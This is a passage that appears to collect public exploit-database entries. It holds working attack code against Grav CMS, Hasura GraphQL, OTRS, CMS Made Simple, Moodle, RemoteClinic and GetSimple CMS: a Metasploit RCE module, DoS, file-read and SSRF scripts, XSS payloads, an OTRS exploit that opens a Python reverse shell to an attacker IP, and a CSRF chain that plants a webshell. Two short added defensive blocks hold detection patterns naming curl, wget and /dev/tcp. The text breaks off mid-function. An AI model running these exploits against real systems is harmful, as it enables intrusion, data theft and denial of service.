          execution. Unauthenticated users can execute a terminal command under the context of the
          web server user.

          Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create
          and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some
          methods of the administrator controller without needing any credentials. Particular method
          execution will result in arbitrary YAML file creation or content change of existing YAML files
          on the system. Successful exploitation of that vulnerability results in configuration changes,
          such as general site information change, custom scheduler job definition, etc. Due to the
          nature of the vulnerability, an adversary can change some part of the webpage, hijack an
          administrator account, or execute an operating system command under the context of the
          web-server user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mehmet Ince <[email protected]>' # author & msf module
        ],
        'References' => [
          ['CVE', '2021-21425'],
          ['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
        ],
        'Privileged' => true,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'DefaultOptions' => {
          'payload' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64',
          'WfsDelay' => 90
        },
        'Targets' => [
          ['Automatic', {}]
        ],
        'DisclosureDate' => '2021-03-29',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            CONFIG_CHANGES # user/config/scheduler.yaml
          ]
        }
      )
    )
  end

  def check
    # During the fix, developers changed admin-nonce to login-nonce.
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin')
    )

    # Guard .first: a page without hidden inputs would otherwise raise instead of returning Safe
    if res && res.get_hidden_inputs.first && !res.get_hidden_inputs.first['admin-nonce'].nil?
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def capture_cookie_token
    print_status 'Sending request to the admin path to generate cookie and token'
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin')
    )

    # Cookie must contain grav-site-az09-admin and the admin-nonce form field must contain a value
    if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ &&
       res.get_hidden_inputs.first && !res.get_hidden_inputs.first['admin-nonce'].nil?
      print_good 'Cookie and CSRF token successfully extracted !'
    else
      fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token were not found.'
    end

    @cookie = res.get_cookies
    @admin_nonce = res.get_hidden_inputs.first['admin-nonce']
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
    end

    capture_cookie_token

    @task_name = Rex::Text.rand_text_alpha_lower(5)

    # The Msf PHP payload contains no quotes, for many good reasons. But GravCMS's command execution
    # library surrounds the PHP binary's parameter with single quotes, so the base64 part of the payload
    # must be wrapped in double quotes for the command to execute successfully.
    payload.encoded.sub! 'base64_decode(', 'base64_decode("'
    payload.encoded.sub! '));', '"));'

    print_status 'Implanting payload via scheduler feature'
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
      'cookie' => @cookie,
      'vars_post' => {
        'admin-nonce' => @admin_nonce,
        'task' => 'SaveDefault',
        "data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php',
        "data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}",
        "data[custom_jobs][#{@task_name}][at]" => '* * * * *',
        "data[custom_jobs][#{@task_name}][output]" => '',
        "data[status][#{@task_name}]" => 'enabled',
        "data[custom_jobs][#{@task_name}][output_mode]" => 'append'
      }
    )

    if res && res.code == 200 && res.body.include?('Successfully saved')
      print_good 'Scheduler successfully created ! Wait for 1 minute...'
    end
  end

  def on_new_session
    print_status 'Cleaning up the scheduler...'
    # Thanks to the YAML update method, we can remove the command details from the config file just by
    # re-enabling the scheduler without any parameter :) It will leave only the job name in the config file.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
      'cookie' => @cookie,
      'vars_post' => {
        'admin-nonce' => @admin_nonce,
        'task' => 'SaveDefault',
        "data[status][#{@task_name}]" => 'enabled'
      }
    )

    if res && res.code == 200 && res.body.include?('Successfully saved')
      print_good 'The scheduler config successfully cleaned up!'
    end
  end
end
```
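The module writes its job into user/config/scheduler.yaml and, in on_new_session, strips the command back out but leaves the randomly named job behind. Both states are what an incident responder would look for on a Grav host. The block below is an added example, not Grav or Metasploit code: it reviews a scheduler.yaml for custom jobs whose command line contains inline interpreter code or a downloader, jobs that run every minute, and empty job entries of the kind the cleanup leaves. The sample file is constructed from the form fields the module posts; the exact layout Grav writes is an assumption, and the minimal parser below handles only that two-level layout (use PyYAML against real files).

```python
"""Audit a Grav scheduler.yaml for planted custom_jobs. Added example; the
sample YAML is constructed to match the fields the module above posts."""
import re

# Constructed sample: a legitimate backup job, the planted job as written by the
# module, and the residue left after the module's cleanup (name only).
SAMPLE_SCHEDULER_YAML = """\
status:
  backup: enabled
  kqzrt: enabled
custom_jobs:
  backup:
    command: bin/grav
    args: backup
    at: '0 3 * * *'
    output: ''
    output_mode: append
  kqzrt:
    command: /usr/bin/php
    args: '-r eval(base64_decode("cGhwaW5mbygpOw=="));'
    at: '* * * * *'
    output: ''
    output_mode: append
  hzmwv: {}
"""

# Inline code handed to an interpreter, or a fetch-and-run primitive.
SUSPICIOUS = re.compile(
    r"(base64_decode|eval\(|\b(php|python\d?|perl|sh|bash)\b\s+-[rce]|\bcurl\b|\bwget\b|/dev/tcp)",
    re.IGNORECASE,
)


def parse_custom_jobs(text: str) -> dict:
    """Parse the custom_jobs mapping of the layout above into {name: {key: value}}.
    A job written as 'name: {}' becomes an empty dict."""
    jobs, current, in_section = {}, None, False
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        key, _, value = raw.strip().partition(":")
        value = value.strip()
        if indent == 0:
            in_section = key == "custom_jobs"
            current = None
            continue
        if not in_section:
            continue
        if indent == 2:
            current = key
            jobs[current] = {}
        elif indent == 4 and current is not None:
            if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
                value = value[1:-1]  # strip the YAML quoting
            jobs[current][key] = value
    return jobs


def audit_scheduler(text: str) -> list:
    """Return (job_name, reason) findings, one per job at most."""
    findings = []
    for name, job in parse_custom_jobs(text).items():
        cmdline = f"{job.get('command', '')} {job.get('args', '')}".strip()
        if not cmdline:
            findings.append((name, "empty job entry (possible cleanup residue)"))
        elif SUSPICIOUS.search(cmdline):
            findings.append((name, f"inline code or downloader in command: {cmdline}"))
        elif job.get("at") == "* * * * *":
            findings.append((name, "runs every minute"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_scheduler(SAMPLE_SCHEDULER_YAML):
        print(f"[!] {name}: {reason}")
```

The empty-entry check matters precisely because of the cleanup step: a five-letter lowercase job name with no command is not something an administrator creates by hand, and it survives after the meterpreter session is gone.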
14. ```python
# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu

import sys
import requests
import threading

HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
THREADS = 300


def create_table():
    # Use the unauthenticated metadata API to create and track a table we control
    data = {"type": "bulk", "args": [
        {"type": "run_sql", "args": {
            "sql": "CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );",
            "cascade": False, "read_only": False}},
        {"type": "add_existing_table_or_view", "args": {"name": "test_db", "schema": "public"}}]}
    endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    return r


def insert_row():
    # One large row so every selected field carries a 100 KB value
    bomb = 'A' * 100000
    data = {"type": "insert", "args": {"table": {"name": "test_db", "schema": "public"},
                                       "objects": [{"test": bomb}], "returning": []}}
    endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    return r


def DoS():
    # A single query selecting the same field a million times
    dups = 'test \n ' * 1000000
    data = {'query': 'query { test_db { ' + dups + '} }'}
    endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    return r


if not create_table().ok:
    print('something went wrong, could not create table.')
    sys.exit(1)

if not insert_row().ok:
    print('something went wrong, could not insert row')
    sys.exit(1)

while True:
    for _ in range(THREADS):
        print('Starting')
        t = threading.Thread(target=DoS, args=())
        t.start()
```
15. ```python
# Exploit Title: Hasura GraphQL 1.3.3 - Local File Read
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu

import requests
import sys

HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
READ_FILE = '/etc/passwd'


def LFI(file):
    # run_sql through the unauthenticated metadata API; pg_read_file() runs with the
    # database server's privileges, so the path is relative to the data directory
    SQLI = "SELECT pg_read_file('../../../../../../../../../{}',0,1000);".format(file)
    data = {"type": "bulk", "args": [{"type": "run_sql", "args": {"sql": SQLI, "cascade": False, "read_only": False}}]}
    endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    return r.json()


res = LFI(READ_FILE)
try:
    print(res[0]['result'][1][0])
except (KeyError, IndexError, TypeError):
    # Error responses do not carry a result array; show them raw
    print(res)
```
16. # Exploit Title: CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)
# Date: 2021/03/19
# Exploit Author: bt0
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14832/cmsms-2.2.15-install.zip
# Version: 2.2.15
# CVE: CVE-2021-28935 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28935

-----------------------------------------------------------
If you log into the Admin panel and open My Preferences, you can exploit XSS in the title field.
Reflected XSS in /admin/addbookmark.php

Some payloads that work:
"><script>prompt(1)</script><"
"><script>alert(1)</script><"
63311';alert(1)//812
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
------------------------------------------------------------
17. ```python
# Exploit Title: Hasura GraphQL 1.3.3 - Server-Side Request Forgery (SSRF)
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu

import requests

HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
REMOTE_URL = 'http://some_remote_addr'


def SSRF(url):
    # add_remote_schema makes the engine fetch the URL itself (introspection);
    # the error it returns echoes the upstream response body back to us
    data = {
        "type": "bulk",
        "args": [
            {
                "type": "add_remote_schema",
                "args": {
                    "name": "test",
                    "definition": {
                        "url": url,
                        "headers": [],
                        "timeout_seconds": 60,
                        "forward_client_headers": True
                    }
                }
            }
        ]
    }
    endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    return r.json()


res = SSRF(REMOTE_URL)
message = ''
raw_body = ''
try:
    if 'message' in res['internal']:
        message = res['internal'].get('message', '')
    if 'raw_body' in res['internal']:
        raw_body = res['internal'].get('raw_body', '')
except (KeyError, TypeError):
    pass

print('Remote URL: ' + REMOTE_URL)
print('Message: ' + message)
print('HTTP Raw Body: ' + raw_body)
print('Error: ' + str(res.get('error', res)))
```
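All three Hasura PoCs above (DoS, local file read, SSRF) depend on the same two conditions: the metadata API at /v1/query answers without an admin secret, and the GraphQL endpoint accepts any document a client sends. The block below is an added example, not Hasura's code or the PoC author's: audit_env() checks an engine's environment for the settings that gate those two surfaces (the variable names are Hasura's documented ones; the sample values are constructed), and count_fields()/accept_query() show the kind of pre-parse guard that rejects the DoS document's shape, a million repeated selections of one field, before it reaches the engine. The field limit is an assumption, and the guard counts names with a regex rather than parsing GraphQL, which is all a front proxy needs for this check.

```python
"""Environment audit and selection-count guard for the Hasura findings above.
Added example; env var names are Hasura's, sample values are constructed."""
import re


def audit_env(env: dict) -> list:
    """Return findings for an engine started with this environment."""
    findings = []
    if not env.get("HASURA_GRAPHQL_ADMIN_SECRET"):
        findings.append("no admin secret: /v1/query (run_sql, add_remote_schema) is open to anyone")
    # Default enabled APIs include 'metadata'; restrict to 'graphql' where only queries are needed
    apis = {a.strip().lower() for a in env.get("HASURA_GRAPHQL_ENABLED_APIS", "metadata,graphql").split(",")}
    if "metadata" in apis:
        findings.append("metadata API enabled; disable it on instances that only serve GraphQL")
    if env.get("HASURA_GRAPHQL_ENABLE_ALLOWLIST", "false").lower() != "true":
        findings.append("allowlist off: clients may send arbitrary queries, including oversized ones")
    if env.get("HASURA_GRAPHQL_DEV_MODE", "false").lower() == "true":
        findings.append("dev mode on: error responses include internal details such as remote-schema bodies")
    return findings


FIELD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
KEYWORDS = {"query", "mutation", "subscription", "fragment"}


def count_fields(query: str) -> int:
    """Count selection names in a GraphQL document, ignoring operation keywords."""
    return sum(1 for name in FIELD_RE.findall(query) if name not in KEYWORDS)


def accept_query(query: str, max_fields: int = 500) -> bool:
    """Pre-parse guard (assumed limit): refuse documents with too many selections."""
    return count_fields(query) <= max_fields


def dos_query(repeats: int) -> str:
    """Same shape as the DoS PoC's query, with a configurable repeat count."""
    return "query { test_db { " + "test \n " * repeats + "} }"


# Constructed sample environments.
EXPOSED_ENV = {
    "HASURA_GRAPHQL_DATABASE_URL": "postgres://...",
    "HASURA_GRAPHQL_ENABLE_CONSOLE": "true",
}
HARDENED_ENV = {
    "HASURA_GRAPHQL_DATABASE_URL": "postgres://...",
    "HASURA_GRAPHQL_ADMIN_SECRET": "long-random-value",
    "HASURA_GRAPHQL_ENABLED_APIS": "graphql",
    "HASURA_GRAPHQL_ENABLE_ALLOWLIST": "true",
}


if __name__ == "__main__":
    for finding in audit_env(EXPOSED_ENV):
        print("[!]", finding)
    print("hardened env findings:", audit_env(HARDENED_ENV))
    print("normal query accepted:", accept_query("query { test_db { test } }"))
    print("PoC-shaped query accepted:", accept_query(dos_query(1_000_000)))
```

Setting an admin secret alone closes the run_sql and add_remote_schema paths; the allowlist and a size guard are what stop the DoS, since that one only needs the GraphQL endpoint.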
18. ```python
# Exploit Title: OTRS 6.0.1 - Remote Command Execution (2)
# Date: 21-04-2021
# Exploit Author: Hex_26
# Vendor Homepage: https://www.otrs.com/
# Software Link: http://ftp.otrs.org/pub/otrs/
# Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
# Tested on: OTRS 5.0.2/CentOS 7.2.1511
# CVE : CVE-2017-16921

#!/usr/bin/env python3
"""
Designed after https://www.exploit-db.com/exploits/43853.
Runs a python reverse shell on the target with the preconfigured options.
This script does not start a listener for you. Run one on your own with netcat or another similar tool.
By default, this script will launch a python reverse shell one-liner with no cleanup. Manual cleanup
needs to be done for the PGP options in the admin panel if you wish to preserve full working condition.
"""
import sys
import requests

baseuri = "http://10.1.1.1/index.pl"
username = "root@localhost"
password = "root"
revShellIp = "10.1.1.2"
revShellPort = 7007

sess = requests.Session()

print("[+] Retrieving auth token...")
data = {"Action": "Login", "RequestedURL": "", "Lang": "en", "TimeOffset": "-480",
        "User": username, "Password": password}
sess.post(baseuri, data=data)
if "OTRSAgentInterface" in sess.cookies.get_dict():
    print("[+] Successfully logged in:")
    print("OTRSAgentInterface", ":", sess.cookies.get_dict()["OTRSAgentInterface"])
else:
    print("[-] Failed to log in. Bad credentials?")
    sys.exit(1)

print("[+] Grabbing challenge token from PGP panel...")
pgp_config_url = baseuri + "?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt::PGP;SysConfigGroup=Framework"
contents = sess.get(pgp_config_url).text
marker = '<input type="hidden" name="ChallengeToken" value="'
idx = contents.find(marker)
if idx == -1:
    print("[-] ChallengeToken not found; does this user have admin rights?")
    sys.exit(1)
challengeToken = contents[idx + len(marker):idx + len(marker) + 32]
print("[+]", challengeToken)

print("[+] Enabling PGP keys in config, and setting our malicious command")
# PGP::Bin and PGP::Options are run as-is when the PGP admin page is opened, so the
# "gpg" binary becomes python and the options become a reverse shell one-liner.
revShell = ("import socket,subprocess,os;"
            "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
            "s.connect((\"" + revShellIp + "\"," + str(revShellPort) + "));"
            "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
            "p=subprocess.call([\"/bin/sh\",\"-i\"]);")
# A list of tuples rather than a dict: the PGP::Key::*[] and PGP::Log*[] fields repeat, and a dict
# would keep only the last value of each. Values are plain text; requests form-encodes them.
settings = [
    ("ChallengeToken", challengeToken),
    ("Action", "AdminSysConfig"),
    ("Subaction", "Update"),
    ("SysConfigGroup", "Framework"),
    ("SysConfigSubGroup", "Crypt::PGP"),
    ("DontWriteDefault", "1"),
    ("PGP", "1"),
    ("PGP::Bin", "/usr/bin/python"),
    ("PGP::Options", "-c '" + revShell + "'"),
    ("PGP::Key::PasswordKey[]", "488A0B8F"),
    ("PGP::Key::PasswordContent[]", "SomePassword"),
    ("PGP::Key::PasswordDeleteNumber[]", "1"),
    ("PGP::Key::PasswordKey[]", "D2DF79FA"),
    ("PGP::Key::PasswordContent[]", "SomePassword"),
    ("PGP::Key::PasswordDeleteNumber[]", "2"),
    ("PGP::TrustedNetworkItemActive", "1"),
    ("PGP::TrustedNetwork", "0"),
    ("PGP::LogKey[]", "BADSIG"),
    ("PGP::LogContent[]", "The PGP signature with the keyid has not been verified successfully."),
    ("PGP::LogDeleteNumber[]", "1"),
    ("PGP::LogKey[]", "ERRSIG"),
    ("PGP::LogContent[]", "It was not possible to check the PGP signature, this may be caused by a missing public key or an unsupported algorithm."),
    ("PGP::LogDeleteNumber[]", "2"),
    ("PGP::LogKey[]", "EXPKEYSIG"),
    ("PGP::LogContent[]", "The PGP signature was made by an expired key."),
    ("PGP::LogDeleteNumber[]", "3"),
    ("PGP::LogKey[]", "GOODSIG"),
    ("PGP::LogContent[]", "Good PGP signature."),
    ("PGP::LogDeleteNumber[]", "4"),
    ("PGP::LogKey[]", "KEYREVOKED"),
    ("PGP::LogContent[]", "The PGP signature was made by a revoked key, this could mean that the signature is forged."),
    ("PGP::LogDeleteNumber[]", "5"),
    ("PGP::LogKey[]", "NODATA"),
    ("PGP::LogContent[]", "No valid OpenPGP data found."),
    ("PGP::LogDeleteNumber[]", "6"),
    ("PGP::LogKey[]", "NO_PUBKEY"),
    ("PGP::LogContent[]", "No public key found."),
    ("PGP::LogDeleteNumber[]", "7"),
    ("PGP::LogKey[]", "REVKEYSIG"),
    ("PGP::LogContent[]", "The PGP signature was made by a revoked key, this could mean that the signature is forged."),
    ("PGP::LogDeleteNumber[]", "8"),
    ("PGP::LogKey[]", "SIGEXPIRED"),
    ("PGP::LogContent[]", "The PGP signature is expired."),
    ("PGP::LogDeleteNumber[]", "9"),
    ("PGP::LogKey[]", "SIG_ID"),
    ("PGP::LogContent[]", "Signature data."),
    ("PGP::LogDeleteNumber[]", "10"),
    ("PGP::LogKey[]", "TRUST_UNDEFINED"),
    ("PGP::LogContent[]", "This key is not certified with a trusted signature!."),
    ("PGP::LogDeleteNumber[]", "11"),
    ("PGP::LogKey[]", "VALIDSIG"),
    ("PGP::LogContent[]", "The PGP signature with the keyid is good."),
    ("PGP::LogDeleteNumber[]", "12"),
    ("PGP::StoreDecryptedData", "1"),
]
sess.post(pgp_config_url, data=settings)

print("[+] Now attempting to trigger the command. If this hangs, it likely means the reverse shell started.")
sess.get(baseuri + "?Action=AdminPGP")
print("[+] Exploit complete, check your listener for a shell")
```
19. # Exploit Title: Moodle 3.10.3 - 'url' Persistent Cross Site Scripting
# Date: 22/04/2021
# Exploit Author: UVision
# Vendor Homepage: https://moodle.org/
# Software Link: https://download.moodle.org
# Version: 3.10.3
# Tested on: Debian/Windows 10

With the role of a teacher, an administrator or a manager (any role that can create a course):
- Create a new course (http://localhost/moodle/course/edit.php?category=1&returnto=topcat).
- Give it any name, short name, date and the other required fields.
- In the "Description" field, click the "link" button.
- In the URL field, enter the payload: <img src=1 href=1 onerror="javascript:alert(1)"></img>
- Create the link; an alert window appears (close it several times so that it disappears), then save the course ("Save and return").

Each time the course description is displayed, the stored XSS fires: trigger it by viewing the course, by editing it, etc.
20. # Exploit Title: RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 13/04/2021
# Exploit Author: Saud Ahmad
# Vendor Homepage: https://remoteclinic.io/
# Software Link: https://github.com/remoteclinic/RemoteClinic
# Version: 2.0
# Tested on: Windows 10
# CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042, CVE-2021-31329

The same payload is used for every field below: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>

# Steps to Reproduce (patient Full Name):
1) Log in to the application as a Doctor.
2) Register a Patient with the Full Name field set to the XSS payload.
3) After registering the patient, go to the "Patients" endpoint.
4) XSS executes.
For a detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/1

# Steps to Reproduce (report Symptoms):
1) Log in to the application as a Doctor.
2) Register a Patient.
3) After registering the patient, the page redirects to the Register Report page.
4) Set the "Symptoms" field to the XSS payload.
5) After registering the report, click Home, which is the "dashboard" endpoint.
6) XSS executes.
For a detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/5

# Steps to Reproduce (report Fever and Blood Pressure):
1) Log in to the application as a Doctor.
2) Register a Patient.
3) After registering the patient, the page redirects to the Register Report page.
4) Scrolling down the page, the two fields "Fever" and "Blood Pressure" are both vulnerable to XSS; inject the XSS payload in both fields.
5) After registering the report, click Home.
6) Now click on the Report; XSS executes.
For a detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/8

# Steps to Reproduce (clinic registration):
1) Log in to the application as a Doctor.
2) Register a New Clinic.
3) The four fields "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact" are all vulnerable to XSS.
4) Inject the XSS payload in all fields.
5) Now go to the Clinic Directory.
6) Click on that Clinic.
7) XSS executes.
For a detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/11

# Steps to Reproduce (medicine name):
1) Log in to the application as a Doctor.
2) Create a New Medicine.
3) The Medicine Name field is vulnerable to XSS; inject the XSS payload.
4) There is client-side validation on maxlength but none on the server side, so change maxlength from 30 to 100 in the browser.
5) Click on Register.
6) Now click on Show All, which is the /medicines/ endpoint.
7) XSS executes.
For a detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/14

# Steps to Reproduce (staff profile):
1) Log in to the application as a Doctor.
2) Create a New Staff Member.
3) The Chat field and the Personal Address field are vulnerable to XSS; inject the XSS payload.
4) The profile is created.
5) Sign out.
6) Now log in as that staff member, whose Chat and Personal Address fields contain the XSS payload.
7) After login, go to My Profile.
8) XSS executes.
For a detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/16
  21. # Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 22/04/2021
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/
# Version: Exploit <= v1.1.1 | Stored XSS <= v1.1.2
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linux & Windows), Internet Explorer
# Vendor: NetExplorer
# Exploit Description:
#   The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.
#   The PHP function htmlspecialchars() attempts to sanitize the user-input, but is trivially bypassed by passing the dangerous characters as escaped hex bytes. This allows attackers to break out of the HTML rendered by the PHP engine, to run arbitrary client-side code within the admin's browser; after the admin submits the POST request from the CSRF attack.
#   Since GetSimple CMS suffers from a known PHP code injection vulnerability within the themes edit page, the attacker can ride the admin's session to perform a chain of XHR requests within the admin's browser. The XHR chain triggered by the CSRF attack will collect the CSRF Token from the themes edit page, and use the token to exploit the PHP Code Injection vulnerability to upload a webshell within every page hosted by the CMS.
# Full Disclosure: github.com/boku7/gsSMTP-Csrf2Xss2RCE/
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6

import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep

FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT

def bullet(char,color):
    C=FB if color == 'B' else FR if color == 'R' else FG
    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '

info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')

class theTHREADER(object):
    def __init__(self, interval=1):
        self.interval = interval
        thread = Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()
    def run(self):
        run()

def webshell(target):
    try:
        websh = "{}/webshell.php".format(target)
        term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
        welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
        print(welcome)
        while True:
            specialmove = input(term)
            command = {'FierceGodKick': specialmove}
            r = requests.post(websh, data=command, verify=False)
            status = r.status_code
            if status != 200:
                r.raise_for_status()
            response = r.text
            print(response)
    except:
        pass

'''
Breakout of the PHP and inject a <script> tag using escaped Hex codepoints to bypass the htmlspecialchars() PHP function
htmlspecialchars() only HTML encodes the chars: &"><'
  "+><script>alert(1)</script>  -->  \x22\x2b\x3e\x3cscript\x3ealert(1)\x3c/script\x3e
PAYLOAD
  - Replace alert(1) payload above with the XHR Chain to gain RCE
  - XHR Chain first collects the CSRF token on the theme-edit.php page, then uses the token to inject PHP code into all pages of the CMS via known vulnerable themes component of core application
'''
def xhrRcePayload():
    hexBreakoutOpen = '\\x22\\x2b\\x3e\\x3cscript\\x3e'
    payload  = 'var e=function(i){return encodeURIComponent(i);};'
    payload += 'var h=\\x22application/x-www-form-urlencoded\\x22;'
    payload += 'var u=\\x22/admin/theme-edit.php\\x22;'
    payload += 'var xhr1=new XMLHttpRequest();'
    payload += 'var xhr2=new XMLHttpRequest();'
    payload += 'xhr1.onreadystatechange=function(){'
    payload += 'if(xhr1.readyState==4 \\x26\\x26 xhr1.status==200){'
    payload += 'r=this.responseXML;'
    payload += 'nVal=r.querySelector(\\x22#nonce\\x22).value;'
    payload += 'eVal=r.forms[1][2].defaultValue;'
    payload += 'xhr2.open(\\x22POST\\x22,u,true);'
    payload += 'xhr2.setRequestHeader(\\x22Content-Type\\x22,h);'
    # for the $_REQUEST[solarflare] used for the webshell via shell_exec(), hex-escape the $ or else it will render in the PHP engine too early in the exploit chain
    payload += 'payload=e(\\x22\\x3c?php echo shell_exec(\\x24_REQUEST[solarflare]) ?\\x3e\\x22);'
    payload += 'params=\\x22nonce=\\x22+nVal+\\x22\\x26content=\\x22+payload+\\x22\\x26edited_file=\\x22+eVal+\\x22\\x26submitsave=Save+Changes\\x22;'
    payload += 'xhr2.send(params);'
    payload += '}};'
    payload += 'xhr1.open(\\x22GET\\x22,u,true);'
    payload += 'xhr1.responseType=\\x22document\\x22;'
    payload += 'xhr1.send();'
    hexBreakoutClose = '\\x3c/script\\x3e'
    return hexBreakoutOpen + payload + hexBreakoutClose

def csrfPayload():
    payload  = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
    payload += '<input type="hidden" name="act" value="addsettings">'
    payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
    payload += '<input type="hidden" name="m_smtp_c_sender_name" value="'+xhrRcePayload()+'">'
    payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="395ed33a5ae4476">'
    payload += '<input type="submit" value="Submit request">'
    payload += '</form></body>'
    return payload

class S(BaseHTTPRequestHandler):
    def do_GET(self):
        victim = self.client_address
        victim = "{}:{}".format(victim[0],victim[1])
        print("{} connected to Malicious CSRF Site!".format(victim))
        self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))

def run(server_class=HTTPServer, handler_class=S, port=80):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print('Stopping httpd...')

def tryUploadWebshell(target,page):
    try:
        blind = target+page
        # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for the Windows cmd prompt)
        webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
        requests.post(url=blind, data=webshUpload, verify=False)
    except:
        pass

def checkWebshell(target):
    try:
        websh = "{}/webshell.php".format(target)
        capsule = {'FierceGodKick':'pwnt?'}
        resp = requests.post(url=websh, data=capsule, verify=False)
        return resp.status_code
    except:
        pass

def sig():
    SIG  = SB+FY+" .-----.._ ,--.\n"
    SIG += FY+" | .. > ___ | | .--.\n"
    SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
